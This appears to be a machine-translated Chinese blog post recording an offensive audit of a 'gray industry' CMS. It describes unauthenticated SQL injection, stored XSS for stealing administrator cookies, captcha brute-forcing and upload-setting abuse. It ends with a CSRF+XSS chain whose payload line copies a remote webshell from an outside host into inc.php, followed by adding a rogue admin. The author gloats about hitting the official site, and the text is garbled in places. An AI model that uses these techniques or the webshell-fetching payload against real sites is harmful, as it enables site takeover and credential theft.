Title: Record a code audit of a gray industry cms

1. Directory structure

First, let’s take a look at the structure. There are related codes in the system folder. I'll show you the loopholes directly.

2. Audit holes

1. Shopping cart gets information asynchronously - SQL injection

system\modules\member\cart.action.php

Although it filters single quotes, it is not protected by single quotes here, so it is an injection here, and the user identity is not verified. The injection can be performed without logging in outside the site.

Direct official website hahahaha!

2. BOM plug-in-directory

system/plugin/bom/bom.plugin.php

Just access it directly. Even if the background is changed, there is nothing wrong with it. It’s still just right!

3. My order-storage XSS (can call administrator cookies)

Since this set of CMS came out earlier, many Xiaohei have discovered XSS vulnerabilities before, but. My XSS seems to be 0day. Hahaha, I need to post the order function. Here I will demonstrate the process of going through it first.

Add pictures

Change the image address to our XSS statement

fileurl_tmp parameter

At this time, the IMG tag is closed and 1 pops up (triggers the "Show order view" managed in the background)

4. Upload configuration-backend Getshell

Some people may see that there are uploads in the background, but in fact, these uploads cannot be used. Although you can change the formatting of the whitelist in the background, you still can't mention it. At this time.just get involved! ~~

Since it filters single quotes, there are no single quotes here.

Write pyload at the allowed upload type

It's done after submitting~~ Write a remote horse through the copy function

5. There are defects in the background verification code

The default account admin This string of MD5 values is the corresponding verification code value, and the interface can be called here for blasting. It's also a small flaw

6. Combination punch Getshell-CSRF+XSS

We directly use XSS to nest an html page, and then simulate all operations. It's done. Starting from modifying the upload format and inserting the horse to simulate access

[/index.php/admin/setting/upload?c=copy('http://www.xxx.com/shell.txt','./inc.php');

Just hit some columns and get it done. If you really don’t worry, add an administrator in the end.

This set of CMS does not filter CSRF attacks, and I don’t take a screenshot. My cousins’ postures are more sexy than me. Wow, hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha

Reprinted from the original link: https://mp.weixin.qq.com/s/8OTU9yQ3pxj6k2QpbEzNRA